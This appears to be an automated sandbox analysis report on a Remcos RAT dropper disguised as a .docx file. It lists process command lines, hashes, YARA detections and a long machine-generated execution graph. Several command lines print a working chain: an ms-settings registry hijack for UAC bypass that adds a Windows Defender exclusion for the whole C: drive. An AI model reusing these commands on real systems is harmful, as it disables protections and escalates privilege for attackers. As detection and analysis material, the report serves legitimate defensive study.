                                                                            Commandline:C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "
                                                                            Imagebase:0x7ff64b560000
                                                                            File size:289'792 bytes
                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:22
                                                                            Start time:02:56:55
                                                                            Start date:03/07/2024
                                                                            Path:C:\Users\Public\xkn.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "
                                                                            Imagebase:0x7ff6c8910000
                                                                            File size:452'608 bytes
                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Antivirus matches:
                                                                            • Detection: 0%, ReversingLabs
                                                                            • Detection: 0%, Virustotal, Browse
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:23
                                                                            Start time:02:56:57
                                                                            Start date:03/07/2024
                                                                            Path:C:\Users\Public\alpha.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:"C:\Users\Public\alpha.exe" /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""
                                                                            Imagebase:0x7ff64b560000
                                                                            File size:289'792 bytes
                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:24
                                                                            Start time:02:56:57
                                                                            Start date:03/07/2024
                                                                            Path:C:\Users\Public\ger.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""
                                                                            Imagebase:0x7ff7e0a00000
                                                                            File size:77'312 bytes
                                                                            MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Antivirus matches:
                                                                            • Detection: 0%, ReversingLabs
                                                                            • Detection: 0%, Virustotal, Browse
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:28
                                                                            Start time:02:56:58
                                                                            Start date:03/07/2024
                                                                            Path:C:\Windows\SysWOW64\extrac32.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:C:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe C:\\Users\\Public\\Libraries\\Pyemdbrd.PIF
                                                                            Imagebase:0xc20000
                                                                            File size:29'184 bytes
                                                                            MD5 hash:9472AAB6390E4F1431BAA912FCFF9707
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:31
                                                                            Start time:02:56:58
                                                                            Start date:03/07/2024
                                                                            Path:C:\Windows\SysWOW64\colorcpl.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:C:\Windows\System32\colorcpl.exe
                                                                            Imagebase:0x630000
                                                                            File size:86'528 bytes
                                                                            MD5 hash:DB71E132EBF1FEB6E93E8A2A0F0C903D
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000001F.00000002.3702973204.0000000004580000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000001F.00000002.3702973204.0000000004580000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000001F.00000002.3702973204.0000000004580000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                            • Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000001F.00000002.3702973204.0000000004580000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                            • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 0000001F.00000002.3702973204.0000000004580000.00000040.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000001F.00000002.3694699773.000000000281F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000001F.00000002.3705302881.0000000006420000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000001F.00000002.3705302881.0000000006420000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000001F.00000002.3705302881.0000000006420000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                            • Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000001F.00000002.3705302881.0000000006420000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                            • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 0000001F.00000002.3705302881.0000000006420000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                            Has exited:false

                                                                            General

                                                                            Target ID:34
                                                                            Start time:02:57:03
                                                                            Start date:03/07/2024
                                                                            Path:C:\Windows \System32\per.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:"C:\\Windows \\System32\\per.exe"
                                                                            Imagebase:0x7ff6ef4b0000
                                                                            File size:49'664 bytes
                                                                            MD5 hash:85018BE1FD913656BC9FF541F017EACD
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Antivirus matches:
                                                                            • Detection: 3%, ReversingLabs
                                                                            • Detection: 0%, Virustotal, Browse
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:38
                                                                            Start time:02:57:06
                                                                            Start date:03/07/2024
                                                                            Path:C:\Users\Public\alpha.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettings.exe
                                                                            Imagebase:0x7ff64b560000
                                                                            File size:289'792 bytes
                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:39
                                                                            Start time:02:57:06
                                                                            Start date:03/07/2024
                                                                            Path:C:\Windows\System32\taskkill.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:taskkill /F /IM SystemSettings.exe
                                                                            Imagebase:0x7ff7c6b00000
                                                                            File size:101'376 bytes
                                                                            MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:40
                                                                            Start time:02:57:06
                                                                            Start date:03/07/2024
                                                                            Path:C:\Windows\System32\SystemSettingsAdminFlows.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:"C:\Windows\system32\SystemSettingsAdminFlows.exe" OptionalFeaturesAdminHelper
                                                                            Imagebase:0x7ff71c770000
                                                                            File size:519'080 bytes
                                                                            MD5 hash:5FA3EEF00388ED6344B4C35BA7CAA460
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Has exited:false

                                                                            General

                                                                            Target ID:42
                                                                            Start time:02:57:07
                                                                            Start date:03/07/2024
                                                                            Path:C:\Users\Public\alpha.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\\Users\\Public\\alpha /c ping 127.0.0.1 -n 2
                                                                            Imagebase:0x7ff64b560000
                                                                            File size:289'792 bytes
                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Has exited:true

                                                                            Disassembly

                                                                            Reset < >

                                                                              Execution Graph

                                                                              Execution Coverage:20.9%
                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                              Signature Coverage:37.8%
                                                                              Total number of Nodes:2000
                                                                              Total number of Limit Nodes:16
                                                                              execution_graph 32894 2984e88 32895 2984e95 32894->32895 32898 2984e9c 32894->32898 32903 2984bdc SysAllocStringLen 32895->32903 32900 2984bfc 32898->32900 32901 2984c08 32900->32901 32902 2984c02 SysFreeString 32900->32902 32902->32901 32903->32898 32904 2980009 32907 29df000 32904->32907 32916 29df216 32907->32916 32909 29df00f 32910 2980015 32909->32910 32911 29df0c7 32909->32911 32919 29df14d 32909->32919 32911->32910 32923 29a9858 timeSetEvent 32911->32923 32924 2984c48 32911->32924 32934 2984168 32911->32934 32948 29df3ad GetPEB 32916->32948 32918 29df222 32918->32909 32922 29df16a 32919->32922 32920 29df15d LoadLibraryA 32921 29df1a0 32920->32921 32920->32922 32921->32911 32922->32920 32922->32921 32923->32910 32925 2984c4c 32924->32925 32926 2984c6f 32924->32926 32927 2984c0c 32925->32927 32930 2984c5f SysReAllocStringLen 32925->32930 32926->32910 32928 2984c20 32927->32928 32929 2984c12 SysFreeString 32927->32929 32928->32910 32929->32928 32930->32926 32931 2984bdc 32930->32931 32932 2984bf8 32931->32932 32933 2984be8 SysAllocStringLen 32931->32933 32932->32910 32933->32931 32933->32932 32935 29841ae 32934->32935 32936 29843b8 32935->32936 32937 2984227 32935->32937 32939 29843e9 32936->32939 32943 29843fa 32936->32943 32950 2984100 32937->32950 32955 298432c GetStdHandle WriteFile GetStdHandle WriteFile MessageBoxA 32939->32955 32942 29843f3 32942->32943 32944 298443f FreeLibrary 32943->32944 32945 2984463 32943->32945 32944->32943 32946 298446c 32945->32946 32947 2984472 ExitProcess 32945->32947 32946->32947 32949 29df3c0 32948->32949 32949->32918 32951 2984143 32950->32951 32952 2984110 32950->32952 32951->32910 32952->32951 32956 29815cc 32952->32956 32960 2985814 32952->32960 32955->32942 32964 2981560 32956->32964 32958 29815d4 VirtualAlloc 32959 29815eb 32958->32959 32959->32952 32961 2985840 32960->32961 32962 2985824 GetModuleFileNameA 32960->32962 32961->32952 32966 2985a78 GetModuleFileNameA RegOpenKeyExA 32962->32966 32965 2981500 32964->32965 32965->32958 32967 2985afb 32966->32967 32968 2985abb RegOpenKeyExA 32966->32968 32984 29858b4 12 API calls 32967->32984 32968->32967 32969 2985ad9 RegOpenKeyExA 32968->32969 32969->32967 32971 2985b84 lstrcpynA GetThreadLocale GetLocaleInfoA 32969->32971 32975 2985bbb 32971->32975 32976 2985c9e 32971->32976 32972 2985b20 RegQueryValueExA 32973 2985b40 RegQueryValueExA 32972->32973 32974 2985b5e RegCloseKey 32972->32974 32973->32974 32974->32961 32975->32976 32978 2985bcb lstrlenA 32975->32978 32976->32961 32979 2985be3 32978->32979 32979->32976 32980 2985c08 lstrcpynA LoadLibraryExA 32979->32980 32981 2985c30 32979->32981 32980->32981 32981->32976 32982 2985c3a lstrcpynA LoadLibraryExA 32981->32982 32982->32976 32983 2985c6c lstrcpynA LoadLibraryExA 32982->32983 32983->32976 32984->32972 32985 2981c6c 32986 2981c7c 32985->32986 32987 2981d04 32985->32987 32990 2981c89 32986->32990 32991 2981cc0 32986->32991 32988 2981f58 32987->32988 32989 2981d0d 32987->32989 32993 2981fec 32988->32993 32996 2981f68 32988->32996 32997 2981fac 32988->32997 32998 2981e24 32989->32998 33001 2981d25 32989->33001 32992 2981c94 32990->32992 33033 2981724 32990->33033 32994 2981724 10 API calls 32991->32994 33015 2981cd7 32994->33015 33002 2981724 10 API calls 32996->33002 33006 2981fb2 32997->33006 33007 2981724 10 API calls 32997->33007 32999 2981e7c 32998->32999 33012 2981e55 Sleep 32998->33012 33018 2981e95 32998->33018 33003 2981724 10 API calls 32999->33003 32999->33018 33000 2981d2c 33001->33000 33004 2981d48 33001->33004 33009 2981dfc 33001->33009 33023 2981f82 33002->33023 33020 2981f2c 33003->33020 33013 2981d79 Sleep 33004->33013 33025 2981d9c 33004->33025 33005 2981cfd 33024 2981fc1 33007->33024 33008 2981cb9 33010 2981724 10 API calls 33009->33010 33027 2981e05 33010->33027 33011 2981fa7 33012->32999 33016 2981e6f Sleep 33012->33016 33017 2981d91 Sleep 33013->33017 33013->33025 33014 2981ca1 33014->33008 33057 2981a8c 33014->33057 33015->33005 33022 2981a8c 8 API calls 33015->33022 33016->32998 33017->33004 33020->33018 33026 2981a8c 8 API calls 33020->33026 33021 2981e1d 33022->33005 33023->33011 33028 2981a8c 8 API calls 33023->33028 33024->33011 33029 2981a8c 8 API calls 33024->33029 33030 2981f50 33026->33030 33027->33021 33031 2981a8c 8 API calls 33027->33031 33028->33011 33032 2981fe4 33029->33032 33031->33021 33034 2981968 33033->33034 33043 298173c 33033->33043 33035 2981a80 33034->33035 33036 2981938 33034->33036 33037 2981a89 33035->33037 33038 2981684 VirtualAlloc 33035->33038 33039 2981947 Sleep 33036->33039 33042 2981986 33036->33042 33037->33014 33044 29816bf 33038->33044 33045 29816af 33038->33045 33039->33042 33047 298195d Sleep 33039->33047 33040 298174e 33041 298175d 33040->33041 33049 298182c 33040->33049 33051 298180a Sleep 33040->33051 33041->33014 33053 29815cc VirtualAlloc 33042->33053 33054 29819a4 33042->33054 33043->33040 33048 29817cb Sleep 33043->33048 33044->33014 33074 2981644 33045->33074 33047->33036 33048->33040 33050 29817e4 Sleep 33048->33050 33055 29815cc VirtualAlloc 33049->33055 33056 2981838 33049->33056 33050->33043 33051->33049 33052 2981820 Sleep 33051->33052 33052->33040 33053->33054 33054->33014 33055->33056 33056->33014 33058 2981b6c 33057->33058 33059 2981aa1 33057->33059 33060 29816e8 33058->33060 33061 2981aa7 33058->33061 33059->33061 33064 2981b13 Sleep 33059->33064 33063 2981c66 33060->33063 33066 2981644 2 API calls 33060->33066 33062 2981ab0 33061->33062 33065 2981b4b Sleep 33061->33065 33071 2981b81 33061->33071 33062->33008 33063->33008 33064->33061 33067 2981b2d Sleep 33064->33067 33068 2981b61 Sleep 33065->33068 33065->33071 33069 29816f5 VirtualFree 33066->33069 33067->33059 33068->33061 33070 298170d 33069->33070 33070->33008 33072 2981c00 VirtualFree 33071->33072 33073 2981ba4 33071->33073 33072->33008 33073->33008 33075 2981681 33074->33075 33076 298164d 33074->33076 33075->33044 33076->33075 33077 298164f Sleep 33076->33077 33078 2981664 33077->33078 33078->33075 33079 2981668 Sleep 33078->33079 33079->33076 33080 29a984c 33083 299daa4 33080->33083 33084 299daac 33083->33084 33084->33084 33085 299dab3 33084->33085 35684 2982ee0 QueryPerformanceCounter 33085->35684 33087 299dac7 35687 2982f08 33087->35687 33089 299dad1 InetIsOffline 33090 299dadb 33089->33090 33091 299daec 33089->33091 35697 2984500 33090->35697 33093 2984500 11 API calls 33091->33093 33094 299daea 33093->33094 35688 298480c 33094->35688 35685 2982ef8 GetTickCount 35684->35685 35686 2982eed 35684->35686 35685->33087 35686->33087 35687->33089 35689 298481d 35688->35689 35690 298485a 35689->35690 35691 2984843 35689->35691 35712 2984570 35690->35712 35703 2984b78 35691->35703 35694 298488b 35695 2984850 35695->35694 35696 2984500 11 API calls 35695->35696 35696->35694 35698 2984504 35697->35698 35701 2984514 35697->35701 35700 2984570 11 API calls 35698->35700 35698->35701 35699 2984542 35699->33094 35700->35701 35701->35699 35702 2982c2c 11 API calls 35701->35702 35702->35699 35704 2984b85 35703->35704 35711 2984bb5 35703->35711 35705 2984bae 35704->35705 35707 2984b91 35704->35707 35708 2984570 11 API calls 35705->35708 35717 2982c44 11 API calls 35707->35717 35708->35711 35710 2984b9f 35710->35695 35718 29844ac 35711->35718 35713 2984598 35712->35713 35714 2984574 35712->35714 35713->35695 35731 2982c10 35714->35731 35716 2984581 35716->35695 35717->35710 35719 29844b2 35718->35719 35721 29844cd 35718->35721 35719->35721 35722 2982c2c 35719->35722 35721->35710 35723 2982c3a 35722->35723 35724 2982c30 35722->35724 35723->35721 35724->35723 35726 2982d19 35724->35726 35729 29864cc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 35724->35729 35730 2982ce8 7 API calls 35726->35730 35728 2982d3a 35728->35721 35729->35726 35730->35728 35732 2982c27 35731->35732 35734 2982c14 35731->35734 35732->35716 35733 2982c1e 35733->35716 35734->35733 35736 2982d19 35734->35736 35739 29864cc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 35734->35739 35740 2982ce8 7 API calls 35736->35740 35738 2982d3a 35738->35716 35739->35736 35740->35738 35741 29a4d4d 35742 298480c 11 API calls 35741->35742 35743 29a4d6e 35742->35743 36469 2984798 35743->36469 35745 29a4da5 36484 2997e14 35745->36484 35748 298480c 11 API calls 35749 29a4dea 35748->35749 35750 2984798 11 API calls 35749->35750 35751 29a4e21 35750->35751 35752 2997e14 25 API calls 35751->35752 35753 29a4e45 35752->35753 35754 298480c 11 API calls 35753->35754 35755 29a4e66 35754->35755 35756 2984798 11 API calls 35755->35756 35757 29a4e9d 35756->35757 35758 2997e14 25 API calls 35757->35758 35759 29a4ec1 35758->35759 35760 298480c 11 API calls 35759->35760 35761 29a4ee2 35760->35761 35762 2984798 11 API calls 35761->35762 35763 29a4f19 35762->35763 35764 2997e14 25 API calls 35763->35764 35765 29a4f3d 35764->35765 35766 298480c 11 API calls 35765->35766 35767 29a4f5e 35766->35767 35768 2984798 11 API calls 35767->35768 35769 29a4f95 35768->35769 35770 2997e14 25 API calls 35769->35770 35771 29a4fb9 35770->35771 35772 298480c 11 API calls 35771->35772 35773 29a4ff3 35772->35773 36502 299cc20 35773->36502 35775 29a5022 36512 299d3f0 35775->36512 35778 298480c 11 API calls 35779 29a5072 35778->35779 35780 2984798 11 API calls 35779->35780 35781 29a50a9 35780->35781 35782 2997e14 25 API calls 35781->35782 35783 29a50cd 35782->35783 35784 298480c 11 API calls 35783->35784 35785 29a50ee 35784->35785 35786 2984798 11 API calls 35785->35786 35787 29a5125 35786->35787 35788 2997e14 25 API calls 35787->35788 35789 29a5149 35788->35789 35790 298480c 11 API calls 35789->35790 35791 29a516a 35790->35791 35792 2984798 11 API calls 35791->35792 35793 29a51a1 35792->35793 35794 2997e14 25 API calls 35793->35794 35795 29a51c5 35794->35795 35796 298480c 11 API calls 35795->35796 35797 29a51e6 35796->35797 35798 2984798 11 API calls 35797->35798 35799 29a521d 35798->35799 35800 29a5241 35799->35800 35801 2997e14 25 API calls 35799->35801 35802 298480c 11 API calls 35800->35802 35801->35800 35803 29a5262 35802->35803 35804 2984798 11 API calls 35803->35804 35805 29a5299 35804->35805 35806 2997e14 25 API calls 35805->35806 35807 29a52bd 35806->35807 35808 298480c 11 API calls 35807->35808 35809 29a52de 35808->35809 35810 2984798 11 API calls 35809->35810 35811 29a5315 35810->35811 35812 2997e14 25 API calls 35811->35812 35813 29a5339 35812->35813 35814 298480c 11 API calls 35813->35814 35815 29a535a 35814->35815 35816 2984798 11 API calls 35815->35816 35817 29a5391 35816->35817 35818 2997e14 25 API calls 35817->35818 35819 29a53b5 35818->35819 35820 298480c 11 API calls 35819->35820 35821 29a53d6 35820->35821 35822 2984798 11 API calls 35821->35822 35823 29a540d 35822->35823 35824 2997e14 25 API calls 35823->35824 35825 29a5431 35824->35825 35826 298480c 11 API calls 35825->35826 35827 29a5452 35826->35827 35828 2984798 11 API calls 35827->35828 35829 29a5489 35828->35829 35830 2997e14 25 API calls 35829->35830 35831 29a54ad 35830->35831 35832 29a54c2 35831->35832 35833 29a5ff1 35831->35833 35835 298480c 11 API calls 35832->35835 35834 298480c 11 API calls 35833->35834 35836 29a6012 35834->35836 35837 29a54e3 35835->35837 35838 2984798 11 API calls 35836->35838 35839 2984798 11 API calls 35837->35839 35841 29a6049 35838->35841 35840 29a551a 35839->35840 35843 2997e14 25 API calls 35840->35843 35842 2997e14 25 API calls 35841->35842 35844 29a606d 35842->35844 35845 29a553e 35843->35845 35846 298480c 11 API calls 35844->35846 35847 298480c 11 API calls 35845->35847 35848 29a608e 35846->35848 35849 29a555f 35847->35849 35850 2984798 11 API calls 35848->35850 35851 2984798 11 API calls 35849->35851 35853 29a60c5 35850->35853 35852 29a5596 35851->35852 35854 2997e14 25 API calls 35852->35854 35855 2997e14 25 API calls 35853->35855 35857 29a55ba 35854->35857 35856 29a60e9 35855->35856 35858 298480c 11 API calls 35856->35858 35859 298480c 11 API calls 35857->35859 35860 29a610a 35858->35860 35861 29a55db 35859->35861 35862 2984798 11 API calls 35860->35862 35863 2984798 11 API calls 35861->35863 35864 29a6141 35862->35864 35865 29a5612 35863->35865 35867 2997e14 25 API calls 35864->35867 35866 2997e14 25 API calls 35865->35866 35868 29a5636 35866->35868 35869 29a6165 35867->35869 35870 2984798 11 API calls 35868->35870 35871 298480c 11 API calls 35869->35871 35872 29a564e 35870->35872 35874 29a6186 35871->35874 35873 29a5659 WinExec 35872->35873 35875 298480c 11 API calls 35873->35875 35876 2984798 11 API calls 35874->35876 35877 29a5680 35875->35877 35878 29a61bd 35876->35878 35879 2984798 11 API calls 35877->35879 35880 2997e14 25 API calls 35878->35880 35881 29a56b7 35879->35881 35884 29a61e1 35880->35884 35882 2997e14 25 API calls 35881->35882 35886 29a56db 35882->35886 35883 29a6a2d 35887 298480c 11 API calls 35883->35887 35884->35883 35885 298480c 11 API calls 35884->35885 35889 29a6217 35885->35889 35888 298480c 11 API calls 35886->35888 35890 29a6a4e 35887->35890 35891 29a56fc 35888->35891 35893 2984798 11 API calls 35889->35893 35892 2984798 11 API calls 35890->35892 35894 2984798 11 API calls 35891->35894 35895 29a6a85 35892->35895 35896 29a624e 35893->35896 35897 29a5733 35894->35897 35898 2997e14 25 API calls 35895->35898 35899 2997e14 25 API calls 35896->35899 35900 2997e14 25 API calls 35897->35900 35901 29a6aa9 35898->35901 35902 29a6272 35899->35902 35903 29a5757 35900->35903 35904 298480c 11 API calls 35901->35904 35905 298480c 11 API calls 35902->35905 35906 298480c 11 API calls 35903->35906 35908 29a6aca 35904->35908 35907 29a6293 35905->35907 35909 29a5778 35906->35909 35910 2984798 11 API calls 35907->35910 35911 2984798 11 API calls 35908->35911 35912 2984798 11 API calls 35909->35912 35914 29a62ca 35910->35914 35913 29a6b01 35911->35913 35915 29a57af 35912->35915 35916 2997e14 25 API calls 35913->35916 35917 2997e14 25 API calls 35914->35917 35920 2997e14 25 API calls 35915->35920 35918 29a6b25 35916->35918 35919 29a62ee 35917->35919 35921 298480c 11 API calls 35918->35921 35922 298480c 11 API calls 35919->35922 35923 29a57d3 35920->35923 35925 29a6b46 35921->35925 35924 29a630f 35922->35924 36524 299a1d4 35923->36524 35927 2984798 11 API calls 35924->35927 35929 2984798 11 API calls 35925->35929 35932 29a6346 35927->35932 35931 29a6b7d 35929->35931 35930 298480c 11 API calls 35933 29a581b 35930->35933 35934 2997e14 25 API calls 35931->35934 35935 2997e14 25 API calls 35932->35935 35937 2984798 11 API calls 35933->35937 35944 29a6ba1 35934->35944 35936 29a636a 35935->35936 35938 298480c 11 API calls 35936->35938 35940 29a5852 35937->35940 35942 29a638b 35938->35942 35939 29a7381 35941 298480c 11 API calls 35939->35941 35943 2997e14 25 API calls 35940->35943 35949 29a73a2 35941->35949 35945 2984798 11 API calls 35942->35945 35946 29a5876 35943->35946 35944->35939 35947 298480c 11 API calls 35944->35947 35951 29a63c2 35945->35951 35948 298480c 11 API calls 35946->35948 35952 29a6bec 35947->35952 35953 29a5897 35948->35953 35950 2984798 11 API calls 35949->35950 35956 29a73d9 35950->35956 35955 2997e14 25 API calls 35951->35955 35954 2984798 11 API calls 35952->35954 35958 2984798 11 API calls 35953->35958 35961 29a6c23 35954->35961 35957 29a63e6 35955->35957 35960 2997e14 25 API calls 35956->35960 35959 298480c 11 API calls 35957->35959 35964 29a58ce 35958->35964 35966 29a6407 35959->35966 35962 29a73fd 35960->35962 35965 2997e14 25 API calls 35961->35965 35963 298480c 11 API calls 35962->35963 35973 29a741e 35963->35973 35967 2997e14 25 API calls 35964->35967 35968 29a6c47 35965->35968 35971 2984798 11 API calls 35966->35971 35969 29a58f2 35967->35969 35970 298480c 11 API calls 35968->35970 35972 298480c 11 API calls 35969->35972 35976 29a6c68 35970->35976 35975 29a643e 35971->35975 35977 29a5913 35972->35977 35974 2984798 11 API calls 35973->35974 35980 29a7455 35974->35980 35978 2997e14 25 API calls 35975->35978 35979 2984798 11 API calls 35976->35979 35982 2984798 11 API calls 35977->35982 35981 29a6462 35978->35981 35985 29a6c9f 35979->35985 35984 2997e14 25 API calls 35980->35984 35983 298480c 11 API calls 35981->35983 35988 29a594a 35982->35988 35990 29a6483 35983->35990 35986 29a7479 35984->35986 35989 2997e14 25 API calls 35985->35989 35987 298480c 11 API calls 35986->35987 35996 29a749a 35987->35996 35992 2997e14 25 API calls 35988->35992 35991 29a6cc3 35989->35991 35995 2984798 11 API calls 35990->35995 35994 298480c 11 API calls 35991->35994 35993 29a596e 35992->35993 35997 298480c 11 API calls 35993->35997 36000 29a6ce4 35994->36000 35999 29a64ba 35995->35999 35998 2984798 11 API calls 35996->35998 36004 29a59ae 35997->36004 36005 29a74d1 35998->36005 36001 2997e14 25 API calls 35999->36001 36002 2984798 11 API calls 36000->36002 36003 29a64de 36001->36003 36010 29a6d1b 36002->36010 36006 2982ee0 2 API calls 36003->36006 36009 2984798 11 API calls 36004->36009 36007 2997e14 25 API calls 36005->36007 36008 29a64e3 36006->36008 36014 29a74f5 36007->36014 36012 298480c 11 API calls 36008->36012 36015 29a59e5 36009->36015 36011 2997e14 25 API calls 36010->36011 36013 29a6d3f 36011->36013 36022 29a651c 36012->36022 36962 299d270 36013->36962 36018 2997e14 25 API calls 36014->36018 36019 2997e14 25 API calls 36015->36019 36025 29a7528 36018->36025 36020 29a5a09 36019->36020 36023 298480c 11 API calls 36020->36023 36021 298480c 11 API calls 36026 29a6d83 36021->36026 36024 2984798 11 API calls 36022->36024 36027 29a5a2a 36023->36027 36029 29a6553 36024->36029 36028 2997e14 25 API calls 36025->36028 36030 298480c 11 API calls 36026->36030 36031 2984798 11 API calls 36027->36031 36033 29a755b 36028->36033 36032 2997e14 25 API calls 36029->36032 36035 29a6dbb 36030->36035 36038 29a5a61 36031->36038 36034 29a6577 36032->36034 36037 2997e14 25 API calls 36033->36037 36036 298480c 11 API calls 36034->36036 36039 2984798 11 API calls 36035->36039 36041 29a6598 36036->36041 36043 29a758e 36037->36043 36040 2997e14 25 API calls 36038->36040 36045 29a6df2 36039->36045 36042 29a5a85 36040->36042 36046 2984798 11 API calls 36041->36046 36044 298480c 11 API calls 36042->36044 36047 2997e14 25 API calls 36043->36047 36050 29a5aa6 36044->36050 36048 2997e14 25 API calls 36045->36048 36053 29a65cf 36046->36053 36049 29a75c1 36047->36049 36051 29a6e16 36048->36051 36052 298480c 11 API calls 36049->36052 36055 2984798 11 API calls 36050->36055 36054 298480c 11 API calls 36051->36054 36058 29a75e2 36052->36058 36056 2997e14 25 API calls 36053->36056 36060 29a6e37 36054->36060 36062 29a5add 36055->36062 36057 29a65f3 36056->36057 36059 298480c 11 API calls 36057->36059 36061 2984798 11 API calls 36058->36061 36065 29a6614 36059->36065 36063 2984798 11 API calls 36060->36063 36067 29a7619 36061->36067 36064 2997e14 25 API calls 36062->36064 36068 29a6e6e 36063->36068 36066 29a5b01 36064->36066 36069 2984798 11 API calls 36065->36069 36534 2995a7c 36066->36534 36072 2997e14 25 API calls 36067->36072 36073 2997e14 25 API calls 36068->36073 36079 29a664b 36069->36079 36071 29a5b2d 36077 2984b78 11 API calls 36071->36077 36074 29a763d 36072->36074 36075 29a6e92 36073->36075 36076 298480c 11 API calls 36074->36076 36969 2987e20 36075->36969 36088 29a765e 36076->36088 36080 29a5b42 36077->36080 36082 2997e14 25 API calls 36079->36082 36083 298480c 11 API calls 36080->36083 36085 29a666f GetCurrentProcess 36082->36085 36093 29a5b63 36083->36093 36084 29a717b 36087 298480c 11 API calls 36084->36087 36955 2997944 GetModuleHandleW GetProcAddress NtAllocateVirtualMemory 36085->36955 36086 298480c 11 API calls 36095 29a6ec5 36086->36095 36094 29a719c 36087->36094 36091 2984798 11 API calls 36088->36091 36090 29a6689 36092 298480c 11 API calls 36090->36092 36099 29a7695 36091->36099 36100 29a66af 36092->36100 36096 2984798 11 API calls 36093->36096 36098 2984798 11 API calls 36094->36098 36097 2984798 